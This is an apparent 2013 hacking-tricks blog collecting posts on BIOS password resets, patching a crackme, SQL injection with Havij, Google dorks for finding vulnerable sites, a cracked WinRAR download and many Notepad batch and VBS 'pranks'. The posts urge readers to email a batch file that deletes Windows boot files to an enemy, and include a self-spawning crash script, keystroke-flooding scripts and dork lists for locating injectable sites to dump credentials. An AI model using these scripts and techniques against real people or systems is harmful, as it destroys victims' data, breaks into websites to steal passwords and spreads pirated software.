Friday, 16 August 2013

How to Reset Bios Password

In this post we will see how to reset the Bios Password,
There are basically  many methods  to reset the BIOS Passwords ....
They are As Follows

1. Using a software  ( s0me require ADMIN access , nd If linux , then what ? :D  )
2. Using master passwords ( different for different BIOS manufacturers )
3. Using DEBUG console  ( Doesnot work in Win 7 nd ab0ve since Microsoft rem0ved debug.exe )
4. Using cmos battery  ( regardless of any OS )
5. Using cmos jumper  (  Regardless of any OS )

I ll explain about all of them ...................................................................
  
1. There are many softwares available on internet ( eg. cmos remover ) which have database for many BIOS manufacturers , BUT requires Admin access ,  So U fail here !


2.  Every BIOS manufacturing company uses Master passwords , Incase U forgot ur one , this can help them in accessing BIOS again even if U forgot ur password for BIOS
( What I doubt is that since everybody knows abt it , So now companies have eliminated this , Still U can try out )


3. If u Have  Windows 7 below i.e. anything except windows 8 or 7  , then theirs a command that clears cmos memory Gare , but only drawback is  BILL GATES removed  debug.exe from win 7


4.  Regardless of a Computer or Laptop , All of them have a small battery , Called cmos battery Coz that powers it .... In laptop's It is usually soldered .   What  u have to do is to remove the battery , Keep the computer or Laptop DEAD for 10 minutes , then without battery switch on the device ...
N0w again shutdown , Keep it in DEAD state for another DEAD minutes . N0w put the battery back its Place and switch the Device on ...................... U reseted the BIOS password  !!!


5.  As 4. point all devices also have a cmos jumper , It is found on your motherboard as battery is found , Just change its orientation .. Switch the device On , Then shut it off .  Then change the orientation back to what it was and reboot the device ................. U reseted the BIOS password  !!!


Thursday, 15 August 2013

How To Crack a Program Step By Step

Hello friends , in this tutorial we'l take the example of keygenme.exe on how to crack!
 
Google and download w32asm and hiew!!
extract it to desktop!!

1) then place KeygenMe.exe, HIEW32.exe from Hiew folder and put folder W32Dasm 8 on desktop and then click on keygenMe.exe and enter any value it will give error as "Try again" or "invalid key"

2) then click on W32DSM89.exe in folder W32Dasm 8 and from dissambler select option 'open file to disassembler' and select the KeygenMe exe file and it will disassemble the code.

3) After that click on search option and in that click on 'find text' and in find type your message say for in this instance "Try again" and click find next and it will find the exact string.

4) when u find the string message and press cursor up button and u will find the specific conditinional or unconditional referenced call address and find the address for this message and in this case the address is 0046723E©.

5) After that in desktop make another copy of KeygenMe.exe by copy paste and then move or drag KeyGenMe - Copy.exe to HIEW32.exe and finally it opens in blue screen HIEW hex editor.

6) when the blue screen HIEW hex editor opens and then click function key F4 and select decode.

7 ) Now press F5 and then ignore 0's of address 0046723E and write .46723E and press enter.

8) After that press F3 and in edit mode at 0666339 set values as 0066639 =90
006663A = 90
...............
..............
........... till upto 40 that is upto
006663f = 90

9) after that save it

10) update and select truncate no

11) finally press F9 and F10 and done

12) now close it and open the KeyGenMe - Copy.exe and enter any value and you get the message " you crack me " and with this you have cracked the keygen.exe file.

Monday, 12 August 2013

Hack Websites Using Havij [SQL Injection Tutorial]

  As said on my previous post now i will Show you step by step the process of SQL injection.



STEPS :

Step1: Find SQL injection Vulnerability in tour site and insert the string (like http://www.target.com/index.asp?id=123) of it in Havij as show below.




Step2: Now click on the Analyse button as shown below.



Now if the your Server is Vulnerable the information about the target will appear and the columns will appear like shown in picture below:


Step3: Now click on the Tables button and then click Get Tables button from below column as shown below:


Step4: Now select the Tables with sensitive information and click Get Columns button.After that select the Username and Password Column to get the Username and Password and click on the Get Table button.





If you dont have Havij the downlod form the below link


Download

Countermeasures: 

Here are some of the countermeasures you can take to reduce the risk of SQL Injection


  1. Renaming the admin page will make it difficult for a hacker to locate it
  2. Use a Intrusion detection system and compose the signatures for popular SQL injection strings
  3. One of the best method to protect your website against SQL Injection attacks is to disallow special characters in the admin form, though this will make your passwords more vulnerable to bruteforce attacks but you can implement a capcha to prevent these types of attack.

Finding SQL Vulnerable Sites Easily


   Hello friends ,
                    Today am gonna help you to find SQL Vulnerable in Websites , so let me tell you what is SQL injection first.


SQL injectionSQL Injection is a technique in which hacker insert SQL codes into web Forum to get Sensitive Information like (User Name , Passwords) to access the site and Deface it. The traditional SQL injection method is quite difficult, but now a days there are many tools available online through which any script kiddie can use SQL Injection to deface a webite, because of these tools websites have became more vulnerable to these types of attacks.

I - Intro :

What you need to know is that 95% of the websites are vulnerable. That's why you need to improve your searching methods, to get better that the rest of the hackers. A scanner may help you, but it will never remplace your brain and often, you're much better than it to find vulnerabilities fast and easy.. We're gonna now speak about useful things to

A - The common google dorks

Search on the sub-domains : site:1.com
Search ONLY on the principal domain : site:www.1.com
Search in the URL : inurl: / allinurl:
Search for a specific file extension : filetype:
Search in the text : intext: / allintext:
Search in the title : intitle:
Search for a domain extension : site:* (fr/gov/mil/edu/org/..)

B - Web file extensions

Common web files extensions where fails are localized : PHP ; CFM ; HTM/HTML ; ASP ; ASPX .

All the other webfiles extensions where a fail may comes up (if you are lucky) : ASMX ; SWF ; DO ; PDF ; SEAM...

Note : Sometimes, you will have an URL like this : http://website.gov/?id=1
It may be vulnerable too but that's extremly rare.

C - Variables

Variables are necessary for SQL injections. Common ones are : id= ; pid= ; file= ; lang= ; pageid= ; path= ; rub= ; option= ; task=

D - What Search engine/Broswer should i use ?

Google, of course. Also, you must know that firefox is, for me, the more convenient to search SQL fails : fast and effective.

II - Become a pro :

First, it might sound stupid but you need to write very fastly. The hacker who don't will spent many time and then, abandons. In fact, a good thing to do is to open something like 5 tabs and use all what
you know about dorks and file extensions. I suggest you, when you are looking for SQL vulns, to search ONLY on ONE website : when you have a fail, that's good, but if you have a fail on your selected
website, that's better.
Here's is an example ;

Tab 1 - site:1.com inurl:cfm?id=
Tab 2 - site:www.1.com inurl:cfm?
Tab 3 - site:1.com inurl:php? inurl:id
Tab 4 - site:www.1.com inurl:asp
Tab 5 - site:1.com inrul:aspx?id

Note : instead of site:1.com , you can do site:*.1.com
Note 2 : You can do this with only 1 tab too, but you need to be really fast - e.g. If you don't have any results, go back immedialty to the previous page and change the dorks.

90% of the time while using this method, i find an SQL vulnerability on the website of my choice in few minutes.

III - A smart trick to use :

When you don't know which type of web file the vuln will infect, you can search by using only the variable.
Example :

inurl:id=1
inurl:lang=1

If you're good, you will get loads of good results with this dork.

IV - A special one

Okay, first it's not a common method, it don't works many times ; Sometimes, try to create a variable.
Example : http://site.gov/staff/graph.php
What yo do : http://site.gov/staff/graph.php?id=1

Why does it may work ? Because ID is a really used variable. So, when you have created it, you can try to inject.

    In my next post i will show you how to use Havij to hack a website so stay tuned .. :)


Friday, 9 August 2013

How To Use Gmail In Offline

Using the Gmail in Offline is made simple with a wonderful Gmail Offline app ..

Using the mail in offline lets you to access your E-Mails in your Gmail with full control. You can get the app for free from Chrome Store. With one click you can install this Gmail Offline App by sign-in into Chrome with your Gmail account.



To add the Gmail Offline to your Chrome follow the below steps
Go the this link Google Gmail Offline App from your Google Chrome Browser : 
 Offline app

1) As soon as you enter to Google Chrome's Apps market you will be allowed to sign-in with you Google Email ID.
2) After Signing into the Google Chrome you will be allowed to Install the App on your chrome Browser by hitting on "Add to Chrome" (Please wait for some time to install the app on your Chrome Browser).
3) After installing the Google Gmail Offline app on your chrome browser you will be able to see you emails on your chrome browser even when your are on offline connection i.e with out internet connection
4)The User Interference of the Google Gmail Offline Apps is not same as Actual Gmail Interference. Of-course the user interference of this app is so easy to navigate and access all the option on your computer with out Internet Connection.
5) You can also compose the email from your offline gmail app in offline connection and the composed app deliverers to the as soon as your computer is connected to Internet.

And you need not to worry about the Security Issues as this app is developed by Google Itself.
 

Saturday, 3 August 2013

Tricks using Notepad

    Ever wondered that a small application like NOTEPAD would be used to hack a system..  So guess what its TRUE , you can .
    P.S :  Try these methods on your OWN RISK , both the admin and the blog site is not responsible for your actions .

How to make cool matrix batch file using notepad :

1. Go to start--> Select Notepad -->Open the Notepad and then Enter
 the below code into the notepad

Code:
        @echo off
       color 2
       :start
       echo %random% %random% %random% %random%
       %random% %random% %random% %random%
       %random% %random% %random% %random%
       goto start





   2. Save the file as .bat file Extension  and note in the below screen shot. i forgoted to insert last sentence (goto start) so if your forgot to insert this goto start sentence in the last  of the code so when you try to see the output then the you cannot see the output properly.




   3.Double click on file That you have saved  and it will open the matrix file like shown below scren shot







 


-----------------------------------------------------------------------------------------------------------------------------------------------------------------------

Make Your Keyboard Type (Any) Message Continuously-VBS Trick :

This VBS trick can make any of your friend's keyboard type any message continuously. Open Notepad, copy the code given below and save the file as Tricks.vbs or *.vbs. You will need to restart your computer to stop this. Try this after closing all important programs.


Code :
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "This is a Virus. You have been infected."
loop


-----------------------------------------------------------------------------------------------------------------------------------------------------------------------

Create a Harmless Funny Virus with Notepad-Continuously eject CD/DVD drives

This VBS trick will create a code which will continuously eject all your connected Optical drives. If you put them back in, it will pop them out again. Copy this code and paste it in Notepad as Virus.vbs or *.vbs.



Code :

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

Double click to open this file and you will be impressed by this awesome trick.


-----------------------------------------------------------------------------------------------------------------------------------------------------------------------

Make a Personal Diary(Log) with Notepad (Easter Eggs):

Notepad Diary
Notepad Diary
You can use this trick to create a personal log with Notepad which will automatically include the current date and time before your note.

Code:
      1) open Notepad and type .LOG in capital letters and press Enter.
      2) Save the file. Now, every time you open this file, notepad will automatically insert the current time and date before the note.
      3) Just enter your note and save the file each time after making an entry.


-----------------------------------------------------------------------------------------------------------------------------------------------------------------------

Lock Files Using Notepad

Code:

if EXIST “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}” goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Are you sure u want to Lock the folder(Y/N)
set/p “cho=>”
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}”
attrib +h +s “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}”
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock folder
set/p “pass=>”
if NOT %pass%==type your password here goto FAIL
attrib -h -s “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}”
ren “Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}” Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Locker created successfully
goto End
:End
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------

NOTEPAD COLORS:

Code :
 
Notepad colors
COPY THIS Code:
@echo off
:A
color 4
pause
color 1
pause
color 2
pause
color 3
pause
color 4
pause
color 5
pause
color 6
pause
color 7
pause
color 8
pause
color 9
goto A 

NOW SAVE IT AS A .BAT FILE (explame:  color.bat  )
Open it and hold space. See the amazing colors changing whilst holding space





-----------------------------------------------------------------------------------------------------------------------------------------------------------------------

USE NOTEPAD TO CHECK IF YOUR ANTIVIRUS IS WORKING :

Code :
 
1. Open Notepad.
2.Now Copy this code in the text file….
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
Then save it with the name fakevirus.exe

Now, If the File got Detected Immediately .. It means your Antivirus is working Properly.
 
Info : This test virus was developed by the European Institute for Computer Anti-Virus Research (EICAR) to provide an easy (and safe!) way to test whether your anti-virus software is working, and see how it reacts when a virus is detected. It is supported by most leading vendors, such as IBM, McAfee, Sophos, and Symantec/Norton.



-----------------------------------------------------------------------------------------------------------------------------------------------------------------------

MAKE CONTINIOUS DIALOG BOX APPEAR HUNDREDS OF TIMES (NOTE HARMLESS AND NOT PERM WHEN YOU RESTART PC IT WILL GO AWAY) :

Code :
 
1.OPEN NOTEPAD
2.COPY AND PASTE THIS CODE TO NOTEPAD
Echo off
:loop1
start command
start command
start command
start command
start command
start command
start command
start command
start command
start command
goto loop2

:loop2
start command
start command
start command
start command
start command
start command
start command
start command
start command
start command
goto loop1
3.SAVE IT AS A .BAT FILE
4.SEND IT TO A FRIEND VIA EMAIL AND PRANK THEM
5.ENJOY

-----------------------------------------------------------------------------------------------------------------------------------------------------------------------

How to crash a PC Forever :

Code :
 
1) OPEN NOTEPAD
2) COPY AND PASTE THIS CODE
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
3) SAVE IT AS A .BAT FILE
This should shutdown the persons computer. It shuts it off once and deletes the files needed to reboot and restart.
REMEMBER – DO NOT CLICK THIS FILE. (for the idiots)
**Also remember this might not work with vista.**
SO SEND THIS TO YOUR WORST ENEMY  VIA EMAIL….REPEAT DO NOT CLICK THE FILE YOURSELF!!!!!!
ENJOY!!
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------

How to create a fake virus that shutdown computer using Notepad  :

Code :
 
1. OPEN NOTEPAD
2. COPY THIS CODE AND PASTE IT TO NOTEPAD
@echo off
msg * u r terminated
shutdown -c “stop me if you can” -s
3. SAVE IT AS A .BAT FILE…..WHEN IT OPENS YOUR COMPUTER WILL SHUTDOWN
4. SEND IT TO YOUR FRIEND VIA EMAIL AND PRANK THEM


-----------------------------------------------------------------------------------------------------------------------------------------------------------------------

How to create your own website using Notepad  :

Code :
 
1. OPEN NOTEPAD
2.TYPE IN HTML CODES-   <doctype html>
<html>
<body>
<h>THIS IS THE HEADING<h>
<p>THIS IS THE PARAGRAPH<p>
<body>
<html>

3. SAVE IT AS A .HTML FILE
4. OPEN IT UP AND YOU HAVE CREATED YOUR PERSONAL WEBSITE!!!!!!
5. HAVE FUN

-----------------------------------------------------------------------------------------------------------------------------------------------------------------------

How to get fake error message??????? :

Picture   
Code :
  • Open Notepad
  • Type in: msg * Error: Your system is affected by virus
  • Save as "virus.bat"
  • Now open that .bat file, now you got error message window
  • Its not virus, just your assumption message.

-----------------------------------------------------------------------------------------------------------------------------------------------------------------------

 

Pranks ::::

 

1) File.bat :

Description: This prank will create and open a file that they cannot close, minimize, or maximize without closing the command prompt behind it.

1. Go into Notepad

2. Type the text below.

 @echo off
md hello
:A
start hello
goto A


3. Save it as file.bat

2) Delete.bat

Description: This prank will make your friends think that all of their files are being deleted and then at the end the file deletes itself so it is untraceable.

1. Go into Notepad.
2. Enter the text below into notepad
 @echo off
echo do you want to delete all of your computer data? (y/n)
pause >nul
echo Do not exit out of the screen or all computer data will be deleted.
ping localhost -n 2 > nul
echo Are you sure you want to delete all computer data? (y/n)
pause >nul
echo deleting all data...
echo.
echo.
pause localhost -n 2 > nul
dir /s
echo.
echo.
ping localhost -n 2 > nul
cls
echo error.. error.. Not all data deleted, are you sure you wish to stop? (y/n)
pause
echo.
echo.
ping localhost -n 1 > nul
cls
dir /s
echo.
echo.
ping localhost -n 2 >nul
cls
echo all data has been deleted..
pause
del "c:delete.bat"


3. Save this as delete.bat (MUST NAME IT THIS!)


3) virus.bat :

Description: The prank will open and unlimited amount of command prompts until the computer crashes or you manually crash it.

1. Go into Notepad
2. type
start virus.bat
virus.bat
(exactly like that!)


3. Save it as virus.bat (must be .bat)


4) shutdown.bat :

Description: This makes your friend think that his/her computer has a virus then their computer shuts down.
1. Go to notepad and type:
@echo off
:A
cls
echo Do you wanna crash your computer? (y/n)
pause
echo Are you sure? (y/n)
pause
echo your computer will crash when the time reaches zero.
pause
msg * Your computer will crash in...
msg * 5
msg * 4
msg * 3
msg * 2
msg * 1
msg * Good-Bye
msg * You have been pwned! :)
shutdown -s -t 00


2. Now save it as shutdown.bat


5) up.bat :

Description: Shows a fake username and password entrance area then deletes it self
1.Go into notepad and type:

@echo off
echo If the proper username and password is not entered all files will be deleted by this virus.
echo Good Luck
set/p\/name=username:
set/p\/password=password:
echo haha you got the username and password wrong
pause
echo Files are being deleted
pause
dir/s
del "c:up.bat"


3. Save it as up.bat (must be this!)
 

6) CD Drive Open and close :

Description: This vbs file will continually open your CD drive


 1. Go into notepad

2. Type the text below

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop
3. Save it as cdopen.vbs

-----------------------------------------------------------------------------------------------------------------------------------------------------------------------

Trick Make Your Computer Speak What You Type!!!!  :

Picture
1.Open Notepad and copy and paste the following code into it.
Dim message, sapi
message=InputBox(“What do you want me to say?”,”Speak to Me”)
Set sapi=CreateObject(“sapi.spvoice”)
sapi.Speak message

2.Now save the notepad file with the name speak.vbs at your desktop.
3.Now double click on speak.vbs Type in the box whatever you want your computer to speak for you.


NOTE: In case if it displays an error message while opening, edit it with notepad and re-type all the quote marks (“)

-----------------------------------------------------------------------------------------------------------------------------------------------------------------------

Toggle Caps Lock button On-Off Continuously :


  • Open Notepad.
  • Copy the following code.

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop
  • Save it as abc.vbs
  • And send it to your friends.

-----------------------------------------------------------------------------------------------------------------------------------------------------------------------

 Hit Enter Key Continuously :


  • Open Notepad and copy the following code.
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop
  • Save it as abc.vbs
  • Now sent it to your friends.

-----------------------------------------------------------------------------------------------------------------------------------------------------------------------


Hit Backspace Key Continuously :


  • Open Notepad and copy the following code.
MsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop
  • Save it as abc.vbs and send it to your friends.

-----------------------------------------------------------------------------------------------------------------------------------------------------------------------


Bush Hid the Facts – Most Popular Notepad Tricks : 

 

This is one of the mysterious notepad tricks we know. According to the trick it really seems Microsoft had put some hack into the coding of notepad making the text hidden after saving it.

Bush Hid the Facts – Most Popular Notepad Trick Open notepad.
Type BUSH HID THE FACTS
Save that file.
Close it
Open It Again See…

 
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------


World Trade Centre Attack Trick – Shocking Notepad Tricks :

Did you know that the flight number of the plane that had hit WTC on 9/11 was Q33N

Open your Notepad
Type the flight number i.e Q33N in Capital Letters.
Increase the Font Size to 72
Change the Font to Wingdings

You will be amazed by the findings. Its a Plane going for 2 building shaped structures & then death.(see below)  WTF ?
Must Be Shocking Right.
But This Is Only Hoax As No Plane No:-Q33N Crashed Into Twin Towers.


-----------------------------------------------------------------------------------------------------------------------------------------------------------------------


Change The Header/Footer Of Your Notepad File :

 

More often than not whenever you get a printout of your notepad file, it starts with “Untitled” or the filename at top, and “Page ” on bottom. Now if you want to get rid of it or want to change it, just follow the simple steps given below.

Open Notepad.
Click on File -> Page Setup.
Replace the text written in the “Header” and “Footer” box (as shown above) by any of the following codes:

&l Left-align the characters that follow
&c Center the characters that follow
&r Right-align the characters that follow
&d Print the current date
&t Print the current time
&f Print the name of the document
&p Print the page number


-----------------------------------------------------------------------------------------------------------------------------------------------------------------------


Pick Your Option Batch File :

 

When used this creates a file which asks you to choose a number between 1-5 and then does a certain action (as shown below – Action accompanied by number):
1 – Shut’s down the computer
2 – Restart’s the computer
3 – Wipes out the hard drive
4 – Net send
5 – Shows a message & then shut’s down the computer
Before you try out this trick, keep in mind that this can cause loss of important data on your (or any one else’s on which you are running this file) computer system. So BEWARE! In order to create the file, follow the steps given below:
Open Notepad.

Code :
 
@echo off
title Get A Life
cd C:
:menu
cls
echo I take no responsibility for your actions. Beyond this point it is you that has the power to kill yourself. If you press ‘x’ then your PC will be formatted. Do not cry if you loose your data or anything.
pause
echo Pick your option:
echo 1. Die Slowly
echo 2. Instant Death
echo 3. Stay Away From This One
echo 4. Die this way (For Wimps!)
echo 5. Easy way out
set input=nothing
set /p input=Choice:
if %input%==1 goto one
if %input%==2 goto two
Save the file with any name and with a .bat extension and close the file.

Tuesday, 30 July 2013

WinRAR 5.0 beta 6 fully cracked

Hey guyz,
        In this I will provide you  WinRAR 5.0 beta 6 fully cracked .

 WinRAR is a powerful archive manager. RAR files can usually compress content by 8 percent to 15 percent more than ZIP files can. WinRAR is a powerful compression tool with many integrated additional functions to help you organize your compressed archives.   It can backup your data and reduce size of email attachments, decompress RAR, ZIP and other files downloaded from Internet and create new archives in RAR and ZIP file format.

WinRAR - What's new in the latest version

Version 5.00 beta 6

1. Fixed a bug in recovery record generation in RAR 5.0 archive format.
Under certain circumstances previous beta versions could produce wrong recovery record data, inefficient to repair a corrupt archive.
Such invalid recovery record can be identified with "Test" command,which issues "Recovery record is corrupt" warning for it.

 

https://lh3.ggpht.com/-wsPLzGP-9BQ/UdPyx97ZCfI/AAAAAAAAAS4/zooYT42n8lA/s471/winrar.PNG  


                 Download

 

Subscribe to our Newsletter

Contact our Support

Email : ajai199@gmail.com